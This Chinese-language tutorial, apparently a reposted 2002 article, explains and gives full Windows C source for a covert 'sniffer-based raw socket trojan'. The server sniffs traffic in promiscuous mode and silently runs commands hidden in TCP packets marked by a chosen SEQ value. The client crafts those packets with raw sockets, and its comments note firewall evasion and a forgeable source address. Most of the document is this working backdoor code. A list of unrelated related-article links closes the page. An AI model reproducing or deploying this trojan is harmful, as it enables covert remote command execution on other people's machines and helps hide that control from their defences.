基于嗅探原理的原始套接字木马
首先我们说说现有木马的特点和功能。早期木马一般都是基于TCP连接的,现在这种木马的生存能力
非常有限,因为直接基于连接的木马很容易被拦截或者发现。然后有通过改变协议来实现通讯隐藏的木马,
比如采用UDP或者ICMP或者其他协议的,当然,这些协议通常对于主机来说并不常用,所以很多安全配置
上就要求尽量禁止这些协议,比如禁止ICMP,让ICMP木马没有了生存机会。反向连接或者ACK木马等非常流
行,因为表现为不是直接的由外向内的TCP连接。
当然木马还更多发展在自身的隐藏上,比如注射、核心木马等。不过该方法的重点暂不是自身进程的
隐藏,而强调在通讯方式上。
这里讲的一种实现方式是:使用基于嗅探原理的原始套接字木马。它的基本实现是:服务器端是一个
sniffer和发包器,它将捕获指定特征的数据包。客户端是一个发包器和嗅探器,用来发送指定特征的数据
包并包括定义的命令以及接收server的数据。当server捕获到该指定特征的数据包时,变成激活状态,通
过分析该数据包,获得client发送的命令和client的IP地址,然后实现相应的命令,并将执行后的结果发
送回client,client的嗅探部分则接收相应的数据。所有的数据发送都是通过原始套接字(或相应)进行。
比如:我们设置特定的协议或者ACK或者其他位及其集合为特征。
该方式的优点:完全基于非连接状态,使用原始包进行通讯,不同协议有关,可使用任意协议,可采
用任意指定的数据包形式,可实现部分的隐藏地址(如果是非交换的局域网则是可以完全的隐藏地址)、
可实现无连接反向通讯、甚至能够突破一些防火墙的监视;
缺点:不是可靠的数据连接、不稳定地执行大数据传输,对于数据流量较大的SERVER,其sniffer的效
率占很重要的地位;
以下是一个简单的演示,看起来比较象一个后门。呵呵。麻雀虽小,五脏具全。
其中定义了一个简单的木马协议,基于TCP协议基础上,使用了SEQ位来判别而不基于端口,能够执行指定的命令。
定义部分:
#define MAX_PACKET_SIZE 65536
#define SEQ_IDENTITY 12345 //验证是否符合需要的SEQ值,这个值在正常包中不会有吧!
#define TROJAN_ID_IDENTITY 6789 //验证是否符合需要的trojan_id值
#define LOCAL_PORT 1234 //本地Port, 这个定义并没有实际意义
#define SERVER_PORT 80 //服务端Port, 这个定义并没有实际意义
typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER, *PIP_HEADER;
typedef struct psd_hdr //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;
typedef struct tcp_hdr //定义TCP首部
{
unsigned short th_sport; //16位源端口
unsigned short th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flags; //6位标志位
unsigned short th_win; //16位窗口大小
unsigned short th_sum; //16位校验和
unsigned short th_urp; //16位紧急数据偏移量
}TCP_HEADER, *PTCP_HEADER;
typedef struct trojan_packet //定义木马使用的协议
{
unsigned int trojan_id; //木马数据包的标识,网络顺序
unsigned short trojan_len; //执行的命令长度,主机顺序
}TROJAN_HEADER, *PTROJAN_HEADER;
/*
木马数据包的结构
————————————————————-
| IP Header | TCP Header | Trojan Header | Trojan Command
————————————————————-
包的最小程度是46字节
*/
#pragma pack(pop)
SERVER部分的演示(Server.cpp):
//
// SniffTrojan
//
// File : Server.cpp
// Comment : The Server model
//
// Created at : 2002.9.13
// Created by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
/*
木马数据包的结构
————————————————————-
| IP Header | TCP Header | Trojan Header | Trojan Command
————————————————————-
包的最小程度是46字节
*/
//
void Usage();
int SniffThread();
int SendThread();
int DecodeData(char* pBuffer);
unsigned long GetLocalIP();
//
int main(int argc, char* argv[])
{
WSADATA WSAData;
int nRetCode = 0;
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 )
{
//WSAStartup Error!
printf(“WSAStartup Error!%d\n”, WSAGetLastError());
nRetCode = -1;
return nRetCode;
}
//开始嗅探数据
SniffThread();
//quit
WSACleanup();
return 0;
}
void Usage()
{
printf(“**************************************************\n”);
printf(“Demo For SniffTrojan\n\n”);
printf(“\t Written by Refdom\n”);
printf(“\t Email: refdom@xfocus.org or refdom@263.net\n”);
printf(“\t Homepage: www.xfocus.org or www.opengram.com\n”);
printf(“**************************************************\n”);
}
int SniffThread()
{
int nRetCode = 0;
int nRecvBytes = 0;
char* pBuffer = NULL;
SOCKET nSock = INVALID_SOCKET;
SOCKADDR_IN addr_in;
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
//define a raw socket
nSock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (INVALID_SOCKET == nSock)
{
nRetCode = -1;
goto Exit0;
}
addr_in.sin_family = AF_INET;
addr_in.sin_port = INADDR_ANY;
addr_in.sin_addr.S_un.S_addr = GetLocalIP();
nRetCode = bind(nSock, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (SOCKET_ERROR == nRetCode)
{
printf(“BIND Error!%d\n”, WSAGetLastError());
goto Exit0;
}
//socket for sniffer
nRetCode = WSAIoctl(nSock, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen),
&dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned , NULL , NULL );
if (SOCKET_ERROR == nRetCode)
{
printf(“WSAIOCTL Error!%d\n”, WSAGetLastError());
goto Exit0;
}
//start sniffing
pBuffer = (char*)malloc(MAX_PACKET_SIZE);
while(1)
{
memset(pBuffer, 0, MAX_PACKET_SIZE);
nRecvBytes = recv(nSock, pBuffer, MAX_PACKET_SIZE, 0);
if (SOCKET_ERROR == nRetCode)
{
printf(“RECV Error!%d\n”, WSAGetLastError());
goto Exit0;
}
if (nRecvBytes < 46)
continue;
DecodeData(pBuffer); //数据解码
}
Exit0:
if (pBuffer != NULL)
free(pBuffer);
if (nSock != INVALID_SOCKET)
closesocket(nSock);
return nRetCode;
}
//获取本地IP地址
unsigned long GetLocalIP()
{
char szLocalIP[20] = {0};
char szHostName[128+1] = “\0″;
hostent *phe;
int i;
if( gethostname(szHostName, 128 ) == 0 ) {
// Get host adresses
phe = gethostbyname(szHostName);
for( i = 0; phe != NULL && phe->h_addr_list[i]!= NULL; i++ )
{
sprintf(szLocalIP, “%d.%d.%d.%d”,
(UINT)((UCHAR*)phe->h_addr_list[i])[0],
(UINT)((UCHAR*)phe->h_addr_list[i])[1],
(UINT)((UCHAR*)phe->h_addr_list[i])[2],
(UINT)((UCHAR*)phe->h_addr_list[i])[3]);
}
}
else
return 0;
return inet_addr(szLocalIP);
}
int DecodeData(char* pBuffer)
{
int nRetCode = 0;
char* pCommand = NULL;
unsigned short usCmdLength = 0;
PIP_HEADER pIPHeader = NULL;
PTCP_HEADER pTCPHeader = NULL;
PTROJAN_HEADER pTrojanHeader = NULL;
pIPHeader = (PIP_HEADER)pBuffer;
//只取TCP包
if (pIPHeader->proto != IPPROTO_TCP)
goto Exit0;
pTCPHeader = (PTCP_HEADER)(pBuffer + sizeof(IP_HEADER));
//验证该TCP包是否其SEQ值符合需要
if (ntohs(pTCPHeader->th_seq) != SEQ_IDENTITY)
goto Exit0;
pTrojanHeader = (PTROJAN_HEADER)(pBuffer + sizeof(IP_HEADER) + sizeof(TCP_HEADER));
//验证该TCP包是否是合法的木马包
if (ntohs(pTrojanHeader->trojan_id) != TROJAN_ID_IDENTITY)
goto Exit0;
usCmdLength = pTrojanHeader->trojan_len; //获得命令的长度
if (0 == usCmdLength)
goto Exit0;
printf(“OK!\n”);
pCommand = (char*)malloc(usCmdLength + 1);
memset(pCommand, 0, usCmdLength + 1);
memcpy(pCommand, pBuffer + sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), usCmdLength);
nRetCode = WinExec(pCommand, SW_HIDE); //执行命令
if (nRetCode > 31)
{
//WinExec Successfully!
}
Exit0:
return nRetCode;
}
控制端的演示(Client.cpp):
//
void Usage()
{
printf(“**************************************************\n”);
printf(“Demo For SniffTrojan\n\n”);
printf(“\t Written by Refdom\n”);
printf(“\t Email: refdom@xfocus.org or refdom@263.net\n”);
printf(“\t Homepage: www.xfocus.org or www.opengram.com\n”);
printf(“Usage: Client.exe ServerIP Command\n”);
printf(“eg:Client.exe 192.168.0.2 \”net user guest /active\”\n”);
printf(“**************************************************\n”);
}
//
int main(int argc, char* argv[])
{
int nRetCode = 0, nCommandLength = 0;
char szDataBuf[MAX_PACKET_SIZE] = {0};
char* pCommand = NULL;
BOOL bOption;
WSADATA WSAData;
SOCKET nSock = INVALID_SOCKET;
SOCKADDR_IN addr_in;
IP_HEADER IP_Header;
TCP_HEADER TCP_Header;
PSD_HEADER PSD_Header;
TROJAN_HEADER Trojan_Header;
Usage();
if (argc != 3)
{
printf(“\nArguments Error!\n”);
return -1;
}
//获得需要执行的命令
nCommandLength = strlen(argv[2]);
pCommand = (char*)malloc(nCommandLength + 2);
memset(pCommand, 0, nCommandLength + 2);
memcpy(pCommand, argv[2], nCommandLength);
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
{
//WSAStartup Error!
printf(“WSAStartup Error!%d\n”, WSAGetLastError());
nRetCode = -1;
return nRetCode;
}
nSock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (INVALID_SOCKET == nSock)
{
printf(“SOCKET Error!%d\n”, WSAGetLastError());
goto Exit0;
}
nRetCode = setsockopt(nSock, IPPROTO_IP, IP_HDRINCL, (char*)&bOption, sizeof(bOption));
if (SOCKET_ERROR == nRetCode)
{
printf(“SetSockOpt Error!%d\n”, WSAGetLastError());
goto Exit0;
}
//填充IP首部
IP_Header.h_verlen = (4 << 4) | (sizeof(IP_HEADER) / sizeof(unsigned long));
IP_Header.tos = 0;
IP_Header.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
IP_Header.frag_and_flags = 0;
IP_Header.ttl = 128;
IP_Header.proto = IPPROTO_TCP;
IP_Header.checksum = 0;
IP_Header.sourceIP = GetLocalIP(); //当然可以伪造自己的地址
IP_Header.destIP = inet_addr(argv[1]); //服务器端IP地址,如果是非交换网络,那么可以不是服务器的地址,而设置一个同网
段或者同HUB的地址。
//填充TCP首部
TCP_Header.th_sport = htons(LOCAL_PORT); //这个端口没有实际意义,倒是可以躲开防火墙
TCP_Header.th_dport = htons(SERVER_PORT); //这个端口没有实际意义,倒是可以躲开防火墙
TCP_Header.th_seq = htons(SEQ_IDENTITY); //木马服务器端的识别标志
TCP_Header.th_ack = 345678;
TCP_Header.th_lenres = (sizeof(TCP_HEADER)/4<<4|0);
TCP_Header.th_flags = 0×01; //随意设置TCP标志位
TCP_Header.th_win = 12345;
TCP_Header.th_urp = 0;
TCP_Header.th_sum = 0;
//填充木马协议的头部
Trojan_Header.trojan_id = htons(TROJAN_ID_IDENTITY);
Trojan_Header.trojan_len = nCommandLength;
//填充TCP伪首部(用于计算校验和)
PSD_Header.saddr = IP_Header.sourceIP;
PSD_Header.daddr = IP_Header.destIP;
PSD_Header.mbz = 0;
PSD_Header.ptcl = IPPROTO_TCP;
PSD_Header.tcpl = htons(sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER) + nCommandLength);
//计算TCP校验和
memcpy(szDataBuf, &PSD_Header, sizeof(PSD_HEADER));
memcpy(szDataBuf + sizeof(PSD_HEADER), &TCP_Header, sizeof(TCP_HEADER));
memcpy(szDataBuf + sizeof(PSD_HEADER) + sizeof(TCP_HEADER), &Trojan_Header, sizeof(TROJAN_HEADER));
memcpy(szDataBuf + sizeof(PSD_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), pCommand, nCommandLength);
TCP_Header.th_sum = CheckSum((unsigned short *)szDataBuf, sizeof(PSD_HEADER) + sizeof(TCP_HEADER) +
sizeof(TROJAN_HEADER) + nCommandLength);
//填充发送缓冲区
memcpy(szDataBuf, &IP_Header, sizeof(IP_HEADER));
memcpy(szDataBuf + sizeof(IP_HEADER), &TCP_Header, sizeof(TCP_HEADER));
memcpy(szDataBuf + sizeof(IP_HEADER) + sizeof(TCP_HEADER), &Trojan_Header, sizeof(TROJAN_HEADER));
memcpy(szDataBuf + sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), pCommand, nCommandLength);
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(LOCAL_PORT);
addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
//发送命令
printf(“Start to send command…\n”);
nRetCode = sendto(nSock, szDataBuf,
sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER) + nCommandLength,
0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (SOCKET_ERROR == nRetCode)
{
printf(“Sendto Error!%d\n”, WSAGetLastError());
goto Exit0;
}
printf(“Send OK!\n”);
Exit0:
if (pCommand != NULL)
free(pCommand);
if (nSock != INVALID_SOCKET)
closesocket(nSock);
WSACleanup();
return 0;
}
基于嗅探原理的原始套接字木马相关推荐
- 基于原始套接字的嗅探器
嗅探器这个代码我去年的时候就已经写过了,这个学期并不是非常忙,顺手复习网络,就又尝试着写了一遍. 其实在写嗅探器的时候,最主要的还是要将网卡设置为混杂模式.在此基础之上,对抓到的数据包进行分析. 这个 ...
- 原始套接字编程(1)
Linux下原始套接字的原理 创建原始套接字: socket(AF_NET, SOCK_RAW, protocol); 1. 参数protocol用来致命所接收的协议包,如果是像IPPROTO_TCP ...
- 使用原始套接字Raw Socket实现数据包嗅探
背景 网络上随时都流通了大量的数据包,我们要想实现抓包并分析,实现思路思路大概是:在合适的时候捕获数据包,保存到缓冲区,作为备用:然后,按照一定的结构和格式去读取缓冲区的内容.由于各种公开的网络协议是 ...
- 网络编程——原始套接字实现原理
目录 1. 基础知识 1.1.概述 1.2.链路层原始套接字 1.3.网络层原始套接字 2.原始套接字的实现 2.1 原始套接字报文收发流程 2.2链路层原始套接字的实现 2.2.1 套接字创建 ...
- 《Python黑帽子:黑客与渗透测试编程之道》读书笔记(二):原始套接字和流量嗅探
目录 前言 1.Windows和Linux上的包嗅探 2.解码IP层 3.解码ICMP层 4.发现主机 结语 前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书中源码 ...
- 利用原始套接字的抓包原理
利用原始套接字的抓包原理: 抓包层 发送接收ip数据包 [接收除了以太网帧头部后面的ip层数据] socket(AF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|I ...
- 黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第三章 网络工程-原始套接字与嗅探(1)主机发现工具与包嗅探
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第三章 网络工程-原始套接字与嗅探(1)主机发现工具 文章目录 黑帽python第二版(Black Ha ...
- 基于原始套接字(raw socket)的网络抓包工具
基于raw socket的网络抓包工具 1. 原始套接字(raw socket)简介 原始套接字可以接收本机网卡上的数据帧或者数据包,利用raw socket可以编写基于IP协议的程序.一般的TCP/ ...
- python通信原理_用python通过原始套接字发送scapy包
要使用原始套接字发送scapy数据包,必须先将数据包转换为原始字节.例如,使用scapy制作的数据包如下:p = IP(dst="192.168.1.254")/TCP(flags ...
最新文章
- HTML Add-on HTML 查看器/编辑器查看器
- 【数字信号处理】相关函数与线性卷积关系 ( 卷积概念 | 相关函数概念 | 相关函数与线性卷积对比 | x(-m) 共轭 与 y(m) 的卷积就是两个信号 位移 m 的相关函数 )
- package-lock.json是做什么用的_做鱼缸用什么玻璃好?
- 简单Nlp分析套路,获取数据(爬虫),数据处理(分词,词频,命名实体识别与关键词抽取),结果展现
- 信息学奥赛一本通C++语言——1110:查找特定的值
- python代码运行顺序_python 代码运行顺序问题?
- 猜年龄 蓝桥 填空题2013省赛
- 两个组件对不齐(css样式问题)
- docker centos rpm离线安装1.8.2及pull的正确姿势
- matlab log函数
- 【Kali】kali主要工具使用说明(文末附超全思维导图)
- Android如何显示音标
- MAE:视觉自监督2021(原理+代码)
- js得到今天日期、本周、本月、本季度、本年起始和结束日期
- 额,我要说一件重要的事+用C++编写一个走迷宫小游戏(1.1版)
- 利用IMU进行激光点云运动畸变校正
- guzzle php,PHP HTTP 客户端 - Guzzle
- Java将汉字转为拼音
- java超级计算器,jdk自带类
- 流言粉碎机:JAVA使用 try catch会影响性能
热门文章
- Response_案例1_路径_相对路径
- MyBatis使增删改不刷新二级缓存
- java的自动装配是什么意思_java – 什么时候在Spring中使用自动装配
- ldap odbc mysql_Mysql+ODBC+OpenLDAP
- Spring Cloud Gateway介绍(一)
- log4j2.xml 的标签 loggers 中 root 的属性 level 指的是什么
- enum 使用规范及技巧(C# 参考)
- Java集合--TreeMap
- OK6410 tftp下载内核、文件系统以及nand flash地址相关整理、总结
- C# HTTP请求后对gzip页面实现解压缩